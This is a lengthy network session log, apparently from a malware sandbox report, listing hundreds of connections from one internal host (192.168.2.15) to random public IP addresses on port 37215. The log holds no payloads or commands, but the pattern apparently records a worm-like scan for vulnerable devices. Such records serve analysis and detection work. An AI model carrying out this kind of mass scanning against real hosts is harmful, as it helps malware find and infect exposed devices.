                                              23632192.168.2.1546040122.226.248.24937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23633192.168.2.1555950186.8.54.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23634192.168.2.154263441.56.28.1837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23635192.168.2.155943441.156.95.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23636192.168.2.1551950186.9.115.16037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23637192.168.2.155576284.190.33.8037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23638192.168.2.1537140121.35.114.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23639192.168.2.155814831.200.151.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23640192.168.2.154135231.29.229.5237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23641192.168.2.155236045.205.208.5337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23642192.168.2.1552876181.209.101.22537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23643192.168.2.1557018121.169.198.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23644192.168.2.1533022222.101.136.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23645192.168.2.154827645.90.46.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23646192.168.2.154683894.135.10.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23647192.168.2.1560772181.248.74.737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23648192.168.2.1545888156.69.100.20737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23649192.168.2.1547228157.192.122.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23650192.168.2.1557956156.71.140.23237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23651192.168.2.1550124181.180.90.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23652192.168.2.1536832102.153.48.6137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23653192.168.2.1544224122.180.144.5137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23654192.168.2.1539420102.242.16.19837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23655192.168.2.155782845.92.130.13037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23656192.168.2.154584641.117.52.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23657192.168.2.1554730157.103.105.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23658192.168.2.1555610157.32.15.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23659192.168.2.154015894.39.81.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23660192.168.2.154826894.236.55.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23661192.168.2.1539028138.241.36.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23662192.168.2.1554954156.182.37.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23663192.168.2.155434231.102.163.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23664192.168.2.1542252102.102.78.837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23665192.168.2.155331837.232.204.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23666192.168.2.1536418157.17.34.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23667192.168.2.154917294.152.220.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23668192.168.2.154185831.239.11.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23669192.168.2.1538390197.119.79.5537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23670192.168.2.1536342122.52.210.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23671192.168.2.153390894.177.14.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23672192.168.2.1534654222.78.196.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23673192.168.2.153491094.233.47.3537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23674192.168.2.155634231.161.102.10337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23675192.168.2.1552640121.178.229.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23676192.168.2.1552478190.247.160.9437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23677192.168.2.1557338222.160.136.4237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23678192.168.2.1533198181.226.86.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23679192.168.2.1554050157.204.34.9637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23680192.168.2.1541702121.93.110.13837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23681192.168.2.1550266157.93.85.8737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23682192.168.2.155921441.97.87.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23683192.168.2.1552486190.236.27.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23684192.168.2.1540600102.242.108.17537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23685192.168.2.1551640186.19.121.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23686192.168.2.154471431.65.149.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23687192.168.2.1560494157.117.129.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23688192.168.2.155201445.222.28.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23689192.168.2.154797894.114.250.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23690192.168.2.1559966122.46.139.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23691192.168.2.1549380157.45.112.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23692192.168.2.1541900222.139.166.11437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23693192.168.2.1560394138.128.229.10537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23694192.168.2.155717431.27.203.22237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23695192.168.2.1549740186.195.166.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23696192.168.2.1560070102.97.39.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23697192.168.2.1535410165.141.179.11137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23698192.168.2.1552510181.88.143.14337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23699192.168.2.1544870181.129.86.21737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23700192.168.2.1556114138.88.239.12037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23701192.168.2.1536432138.219.118.21037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23702192.168.2.1546620222.67.102.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23703192.168.2.1559710102.170.216.10937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23704192.168.2.1545528121.236.109.5837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23705192.168.2.1555418121.197.242.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23706192.168.2.1558444138.59.10.23037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23707192.168.2.155214094.1.242.17137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23708192.168.2.1534672190.243.50.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23709192.168.2.1550404121.189.194.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23710192.168.2.1547248156.237.192.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23711192.168.2.15566629.184.0.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23712192.168.2.1558428102.212.32.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23713192.168.2.1543020122.30.166.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23714192.168.2.1540044102.77.199.23937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23715192.168.2.154107241.164.135.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23716192.168.2.1545066197.10.241.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23717192.168.2.154144431.13.147.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23718192.168.2.1556126197.85.189.23337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23719192.168.2.154008045.171.182.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23720192.168.2.1544228121.148.76.1337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23721192.168.2.153287641.166.239.16237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23722192.168.2.1539598157.100.238.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23723192.168.2.1534452122.93.16.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23724192.168.2.153929845.247.72.2637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23725192.168.2.1535114190.255.110.3337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23726192.168.2.1548530197.70.211.19137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23727192.168.2.155347031.106.40.18537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23728192.168.2.1556892122.22.95.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23729192.168.2.1560574190.146.150.21337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23730192.168.2.1559968102.137.233.9037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23731192.168.2.1544738157.214.47.1437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23732192.168.2.1534702181.247.212.8537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23733192.168.2.1542576156.190.80.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23734192.168.2.154116445.123.196.12937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23735192.168.2.1535376157.45.109.18237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23736192.168.2.1540448102.29.150.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23737192.168.2.1538148182.31.113.6837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23738192.168.2.1551352156.8.186.19937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23739192.168.2.1547058222.115.174.22337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23740192.168.2.1536596121.87.89.5637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23741192.168.2.154750631.242.9.25337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23742192.168.2.154630294.7.49.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23743192.168.2.1553442181.235.233.3137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23744192.168.2.1550304181.233.98.13737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23745192.168.2.1544376209.225.239.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23746192.168.2.1537294222.250.132.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23747192.168.2.1540472102.188.144.15537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23748192.168.2.1546182222.93.38.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23749192.168.2.1543974222.42.170.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23750192.168.2.1535280157.146.46.9837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23751192.168.2.1545116190.90.180.15337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23752192.168.2.1546398190.150.7.24137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23753192.168.2.1543836222.195.129.2037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23754192.168.2.154969694.200.63.15437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23755192.168.2.1546798121.203.189.14837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23756192.168.2.1544870122.50.48.21837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23757192.168.2.1550214102.244.42.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23758192.168.2.155864037.197.252.21637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23759192.168.2.1558058222.72.233.2237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23760192.168.2.1535262186.65.156.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23761192.168.2.1536856138.188.255.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23762192.168.2.1539484172.109.137.2437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23763192.168.2.1555552121.225.226.16837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23764192.168.2.154334694.82.109.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23765192.168.2.1542820157.26.219.937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23766192.168.2.1547386121.144.208.7537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23767192.168.2.155988845.242.111.1737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23768192.168.2.1552696197.231.34.17637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23769192.168.2.1558646156.66.194.17437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23770192.168.2.1557720222.18.211.13537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23771192.168.2.1535414186.232.76.3437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23772192.168.2.1552718197.70.16.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23773192.168.2.1559666102.215.251.8837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23774192.168.2.1546766122.96.8.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23775192.168.2.153494641.114.21.17337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23776192.168.2.154023037.231.164.14637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23777192.168.2.1535254102.44.29.5737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23778192.168.2.1545906222.143.224.11337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23779192.168.2.1559912157.162.138.12237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23780192.168.2.1551660197.203.117.5937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23781192.168.2.1541206102.126.68.7037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23782192.168.2.1549618156.166.153.13337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23783192.168.2.1547068102.187.174.16537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23784192.168.2.155138645.145.45.7637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23785192.168.2.1551568186.195.221.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23786192.168.2.154145841.44.246.21137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23787192.168.2.1549420122.220.59.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23788192.168.2.154417641.145.39.24737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23789192.168.2.1548394122.95.22.3637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23790192.168.2.155655045.82.128.10237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23791192.168.2.1544812197.55.85.12537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23792192.168.2.1543028222.134.244.10037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23793192.168.2.1546724222.40.77.20537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23794192.168.2.154686831.182.102.19737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23795192.168.2.1556642222.219.171.20637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23796192.168.2.1537692138.9.143.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23797192.168.2.1549930222.195.21.24437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23798192.168.2.1555414181.11.136.22837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23799192.168.2.1534014122.94.164.17737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23800192.168.2.155249894.221.205.4637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23801192.168.2.1558086222.139.133.1237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23802192.168.2.153367045.232.16.16337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23803192.168.2.154771097.27.150.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23804192.168.2.155597294.9.148.15737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23805192.168.2.153553089.220.196.14937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23806192.168.2.1540232138.42.176.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23807192.168.2.1553474190.126.204.19637215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23808192.168.2.1536422122.12.220.17837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23809192.168.2.1558214157.144.97.20137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23810192.168.2.154280641.112.77.1537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23811192.168.2.153934241.19.102.25437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23812192.168.2.1551558190.4.30.11837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23813192.168.2.1543492197.36.78.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23814192.168.2.1551090222.69.49.19037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23815192.168.2.153767445.61.3.18137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23816192.168.2.1534578102.234.231.20237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23817192.168.2.1535424156.44.189.12337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23818192.168.2.154474637.85.220.24237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23819192.168.2.1547982121.95.207.22137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23820192.168.2.1541364138.104.46.23137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23821192.168.2.1556684181.29.96.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23822192.168.2.1539850181.224.169.2337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23823192.168.2.1554182156.68.98.7237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23824192.168.2.154462445.178.152.2537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23825192.168.2.155335612.172.245.20437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23826192.168.2.1532902186.119.237.25237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23827192.168.2.153719041.4.18.2737215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23828192.168.2.1559694190.214.161.20037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23829192.168.2.1539274140.90.112.4837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23830192.168.2.1555830197.67.0.8937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23831192.168.2.1542902222.203.241.21437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23832192.168.2.1540564190.206.233.23537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23833192.168.2.1550192190.253.107.9237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23834192.168.2.1533898121.174.164.6537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23835192.168.2.155381294.14.113.23437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23836192.168.2.1535904121.41.227.13437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23837192.168.2.1559434121.184.46.11537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23838192.168.2.155346048.172.88.7437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23839192.168.2.153638231.214.85.18837215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23840192.168.2.1546286122.170.166.21537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23841192.168.2.1551494190.205.210.19337215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23842192.168.2.1534140222.52.225.22437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23843192.168.2.1544882138.172.119.19437215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23844192.168.2.153975841.174.246.17037215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23845192.168.2.1545774122.82.185.6937215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23846192.168.2.154153837.183.153.9137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23847192.168.2.1552128157.82.124.19537215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23848192.168.2.1552490222.42.198.25137215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23849192.168.2.1548738181.129.98.237215
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              23850192.168.2.155452645.74.231.5837215
